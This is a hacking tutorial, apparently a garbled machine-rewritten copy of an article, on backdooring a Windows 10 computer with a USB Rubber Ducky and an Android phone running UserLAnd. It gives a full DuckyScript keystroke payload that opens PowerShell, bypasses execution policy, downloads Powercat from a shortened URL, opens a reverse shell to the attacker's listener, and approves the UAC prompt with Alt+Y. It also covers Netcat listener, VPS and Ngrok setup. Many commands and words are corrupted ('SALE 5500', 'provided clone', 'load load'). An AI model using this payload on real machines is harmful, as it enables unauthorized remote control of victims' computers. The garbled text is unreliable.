With an inconsistent Android phone and USB memory, an attacker can compromise on a Windows 10 computer in less than 15 seconds. Once a root shell has been established, long-lasting endurance to the back door can be configured with just two simple commands – all at the same time bypassing antivirus and Windows Defender.
How this attack works
Powercat is a full-featured PowerShell module. It works much like Netcat and allows PowerShell users to create TCP and UDP tunnels with simple command line arguments. A PowerShell payload will be created to download, import and execute Powercat in a single command. Then it will be encoded into a binary format that USB Rubber Ducky can understand.
With USB Rubber Ducky, Powercat is performed in Windows 10 as an administrator who quickly establishes a root shell via the attacker Netcat listener. At that time, persistence was configured with the command schtasks designed by Microsoft to automate tasks and commands in Windows 10.
Some hardware is required to perform this hack as some of you may have already changed. Below are the four key items.
USB Rubber Ducky identifies itself as a keyboard when inserted into the computer and then automatically continues to write malicious commands that are pre-programmed into its payload. The load load can be adapted to perform a myriad of advanced functions. The prices of USB Rubber Ducky from Hak5 start at $ 45.
Buy a USB Rubber Ducky from Amazon | Hak5
As an alternative to USB Rubber Ducky, NetHunter and DroidDucky projects can arm Android devices into keystroke injection tools. They require you to change the Android operating system that is outside the article, unfortunately. Both NetHunter and DroidDucky are great projects for those who are willing to change the phone's operating system. Imagine connecting an Android phone to any computer and having it run complex PowerShell payloads in seconds – no USB rubber ducky required.
2nd Android device with UserLAnd Installed
All Android phones or tablets that can run The UserLAnd app will be suitable. The device need not be rooted. All that is required is internet access via Wi-Fi and the above-mentioned UserLAnd application.
3. OTG Adapter (conditional)
After creating the PowerShell payload (in a later step), it must be moved to the microSD card in UBS Rubber Ducky. Some Android phone and tablet platform models are equipped with a microSD expansion slot for more storage, so if you have one of them, it's good that you go because you can transfer the file that way.
If the device does not have a microSD slot, then you need an OTG adapter of some kind, allowing you to connect memory cards to your device via the charging port. An all-in-one solution would be Monoprice USB-C microSD Reader if your phone has a USB type C port. Lexar makes a similar product for Micro-USB ports.
Since USB Rubber Ducky comes with a microSD-to-USB adapter, you can choose an OTG adapter that has a female USB type A end to connect the microSD adapter into. If you have a USB -C port on your Android device, Aukey makes a good adapter. For Micro-USB ports, there are many inexpensive options, such as Ugrin's cable.
Alternatively, a combination of adapters can get the job done. As you can see below, I use an auxiliary adapter together with an Anchor Portable Card Reader.
4. Virtual Private Server (Optional)
A virtual private server (VPS) is required depending on the attack scenario. If a Wi-Fi network is shared with the target device, it is best to embed the attacker's local IP address into the payload. In other scenarios, it may be necessary to deploy a VPS or Ngrok server.
Step 1: Getting Started with UserLAnd
Before moving forward, check out the Distortion's guide on turning an Android phone into a hacking device without root, as well as my WPA2 Wi-Fi Wizard password with Android because they cover the user base Basics and configuration of Kali Linux, Ngrok, and installation of necessary software that will be required to follow this article.  You must install and configure UserLAnd, create a new file system, and connect to the operating system via SSH with ConnectBot (or JuiceSSH or the built-in SSH client).
Step 2: Update System & Install Essential Software
Like all Unix-based devices, it is a good idea to make sure the installed packages are fully up-to-date before continuing with projects. Be sure to update the system and install the necessary software, and install Java as needed for the USB Rubber Ducky utility, with the commands below.
sudo apt-get update && sudo apt-get dist-upgrade
This command can take several minutes to complete depending on available internet speed and Android CPU. Older Android devices take longer to download and decompress packages.
To install the necessary software, use the command below.
sudo apt-get update && sudo apt-get install utilities netcat gnupg curl wget git nano screen  Java is required to compile Ducky payload. To install it, use the command below.
sudo apt-get install default-jre-headless
Restart the Android device to ensure that all package and kernel updates come into effect the next time Android encounters UserLAnd Kali OS.
Step 3: Starting Netcat Listener
Based on the attack scenario, there are several ways to configure the Netcat listener that allows remote access to the Windows computer's goals.
- Local IP address . If the target computer is on the same Wi-Fi network as the Android device, it is possible to simply launch the Netcat listener in UserLAnd Kali OS. While it is private and fast, this method is not ideal. If and when the target is disconnected from the shared Wi-Fi network, the Netcat connection will be disconnected and the device cannot be accessed when moving between different networks.
- Virtual Private Server . VPS is ideal for distance chopping targets as they move between different Wi-Fi networks anywhere in the world. In this scenario, the attacker would buy a cheap VPS and SSH in. Netcat and Screen would be installed for prolonged endurance in the hacked Windows computer. This can be set entirely with Android.
- Ngrok . Remote access with Ngrok has to some extent been covered in " Hack WPA2 Wi-Fi password with Android." In this case, Ngrok would forward requests to the attacker's Android device. Free Ngrok accounts do not allow users to recover subdomains, so it would only allow endurance until the Ngrok server terminates on the Android device. While it is possible to keep a server running on Android for a long time, it is inevitable that it will eventually end when Android restarts or closes the UserLAnd app in the background.
In any case, it is a good idea to set the screen so that terminal sessions remain despite the SSH connections being closed. The screen allows users to manage multiple terminal sessions within the same console. Readers are encouraged to learn how to use Screen as it makes it easy to navigate and "delete" multiple terminal sessions without losing data.
To start a new screen session, just type the screen.
use the ifconfig-a command to identify the local IP address used by the system. This IP will be required in the next step when creating the payload.
wlan0: flags = 4163
mtu 1500 inet 192.168.0.208 mesh mask 255.255.255.0 broadcast 192.168.0.255 inet6 ::::: prefixes 64 scopeid 0x20 unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX package 95745 bytes 115985231 (110.6 MiB) RX error 0 fell 0 exceeded 0 frame 0 TX package 44735 bytes 4289090 (4.0 MiB) TX error 0 dropped 0 exceeded 0 carrier 0 collisions 0
In UserLAnd Kali OS there will be many available interfaces. The "Wlan0" or "wlan1" interface is likely to hold the device's local IP address (192.168.0.208). VPS users will instead embed the same external IP address used when SSHing into the server. Ngrok users must configure a server and embed the URL into the payload.
Finally, start the Netcat listener with the command below. Netcat -vv-1 -p 1234
Using the port  -p ) 1234, Netcat will listen ( -l ) to all available interfaces. -vv ( verbose ) will print the target's IP address in the terminal when a new connection is established.
After Android restarts, UserLAnd launches the app and SSH to the new Kali system. Use nano to create a new "payload.txt" file in the home ( ~ / ) directory.
nano ~ / payload.txt
Comments ( REM ) has been added to explain what each line in the payload does.
REM This first delay stops Ducky for 5.5 seconds to give the target REM operating system sometime to mount USB as a keyboard device. SALE 5500 REM Opens the Windows Run prompt. GUI r REM Delays .7 seconds to give Run prompt time to open. DELAY 700 REM Type of PowerShell payload. STRING powershell / w 1 / C $ a = $ env: TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $ a ipmo $ a powercat -c 192.168.0.208 -p 1234 -e powershell REM Press Ctrl + Shirt + Enter to perform PowerShell with administrative permissions. CTRL-SHIFT ENTER REM Delay .85 seconds to give UAC prompt time to open. SALE 850 REM Press Alt + Y to bypass UAC. ALT y
PowerShell one-liner goes a lot. There are several commands bound and separated by semicolons.
- $ a = $ env: TEMP – The target temp directory is set to the variable $ a. This variable is called twice later in the script. First, it acts as the output directory for powercat.ps1 and is called again when it is imported. Using the simple letter $ helps a variable to shorten the total length of the payload. It is more effective than using "C: Users" USERNAME% AppData Local Temp "several times in the payload.
- Set-ExecutionPolis Bypass – Set-ExecutionPolicy is a security feature of PowerShell that prevents many similar PowerShell payloads from being executed. In several tests I simply found that -ExecutionPolicy was not enough to bypass this security feature. As an administrator, this policy can be bypassed.
- wget https://cutt.ly/cW13i -o $ a.ps1 – PowerShell is instructed to call a web request ( wget ) and download powercat.ps1 with the abbreviated cutt. suffer URL. This URL links directly to the Powercat GitHub page, but can be changed to the entire URL or other mapped URL. Powercat.ps1 is saved ( -o ) to the temp directory ( $ a ) with the file name "d.ps1". The file name was shortened to a single letter to keep Ducky payload as short as possible.
- ipmo $ a dpsps – PowerShell's import mode feature is called with the alias ipmo . Again, with the shorter version of the command to keep the Ducky payload card. Powercat.ps1 is imported.
- powercat -c 192.168.0.208 -p 1234 -e powershell – Finally, Powercat is run and instructed to connect ( -c ) to the attacker server ( 192.168.0.208 ) on port ( -p ) 1234 and running ( -e ) PowerShell when the connection is established. This effectively gives the attack's remote access to a root PowerShell terminal. The REM comments can remain in the payload and do not affect the key press injections. To save and exit the nano-terminal, press Ctrl-x then then then Enter .
Step 5: Encode the load load
USB Rubber Ducky payload cannot be loaded to microSD card in plain text. Instead, Hak5 Duck Encoder is used to convert plain text payload in a binary format.
To clone the Duck Encoder repository, use the command below.
provided clone https://github.com/hak5darren/ USB-Rubber-Ducky /
Change ( cd ) to the newly created encoder / directory.
cd USB-Rubber-Ducky / Encoder /
And encode payload.txt under the command. This command will use encoder.jar to convert the input ( -i) into the necessary "inject.bin" output ( -o ) binary. The output file name is not arbitrary and must be termed "inject.bin" for Ducky to perform keystroke injection attacks.
java -jar encoder.jar -i ~ / payload.txt -o inject.bin
Hak5 Duck Encoder 2.6.4 Loading file ..... [ OK ] Loading keyboard files ..... [ OK ] Loading language file ..... [ OK ] Loading DuckyScript ..... [ OK ] DuckyScript Complete ..... [ OK ]
When it's clear there will be a new "injection.bin" file in the encoder / directory. This can be verified by the command below ls-1 .
ls -l-rw-r-r--. 1 rot rot 1466 jan 11 11:39 README -rw-r - r--. 1 rot rot 57535 jan 11 11:39 encoder.jar -rw-r - r--. 1 rot rot 86 jan 12 01:57 inject.bin drwxr-xr-x. 2 root root 4096 Jan 11 11:39 resources drwxr-xr-x. 2 root root 4096 Jan 11 11:39 src
Step 6: Connect the Ducky MicroSD to the Android device
Use the card reader adapter, internal microSD slot or OTG adapter with card reader, insert the Ducky microSD card into Android unit. The microSD file content can be viewed using Android's download program.
After a few seconds, a new removable device will be available via the download program ( example). Navigate back to Kali OS terminal. Kali OS does not have access to external storage devices (ie the microSD card), so "inject.bin" must first be copied ( cp ) to / sdcard / Download / directory, then copied to microSD using Android OS.
cp ~ / USB-Rubber-Ducky / Encoder / inject.bin / sdcard / Download /
And there is now in the download app.  Android for Hackers: How Backdoor Windows 10 uses an Android Phone & USB Rubber Ducky ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>